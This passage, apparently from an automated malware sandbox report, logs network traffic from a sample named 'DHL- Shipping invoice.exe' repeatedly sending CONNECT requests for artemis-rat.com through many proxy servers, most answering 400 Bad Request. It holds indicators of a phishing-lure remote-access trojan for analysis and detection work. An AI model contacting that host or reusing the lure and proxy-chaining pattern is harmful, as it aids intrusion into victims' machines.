                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1368192.168.2.454156202.159.35.574436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.978512049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1369192.168.2.453433161.97.163.5226776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.979320049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562575102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250444889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.562700987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.062962055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.562720060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.062906981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1370192.168.2.453982103.66.177.17322516484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.994106054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1371192.168.2.454196202.159.35.574436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.998737097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1372192.168.2.454206202.159.35.574436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.002963066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1373192.168.2.453767184.170.249.6541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.006345987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1374192.168.2.453985120.234.203.17190026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.028305054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.459378004 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1375192.168.2.453529178.62.14.6850506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.034805059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.103903055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.141009092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.140829086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1376192.168.2.45342246.209.54.11080806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.038211107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.688513041 CET19INHTTP/1.1 200 OK
                            Mar 12, 2024 08:39:15.719938993 CET202INHTTP/1.0 504 Gateway Timeout
                            Content-Length: 735
                            Content-Type: text/html
                            Date: Sat, 02 Mar 2024 04:49:06 GMT
                            Expires: Sat, 02 Mar 2024 04:49:06 GMT
                            Server: Mikrotik HttpProxy
                            Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1377192.168.2.454083121.66.198.7641456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.040115118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1378192.168.2.45407760.12.168.11490026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.073621035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.476074934 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 08:15:52 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1379192.168.2.45411243.129.228.4678916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.073973894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1380192.168.2.453568200.108.190.11098006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.073980093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1381192.168.2.453575190.83.15.2419996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.075349092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.265870094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:24.381639957 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 724
                            Content-Type: text/html
                            Date: Tue, 12 Mar 2024 07:37:17 GMT
                            Expires: Tue, 12 Mar 2024 07:37:17 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1382192.168.2.454185104.19.85.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.075704098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.162967920 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1383192.168.2.453611185.89.156.13056786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.078984976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1384192.168.2.45359995.66.138.2188806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.085741997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1385192.168.2.45413049.13.161.231806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.102843046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.274856091 CET327INHTTP/1.1 400 Bad Request
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1386192.168.2.454217172.67.182.126806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.103802919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.190623999 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1387192.168.2.454222104.27.15.161806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.105654001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.192871094 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1388192.168.2.454230104.25.87.42806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.110712051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.198216915 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1389192.168.2.454233172.67.3.108806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.111641884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.198859930 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1390192.168.2.454239172.67.36.21806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.113512993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.201010942 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1391192.168.2.454240104.19.109.209806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.113914967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.201241016 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:05 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1392192.168.2.45413437.1.199.18806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:05.114629984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
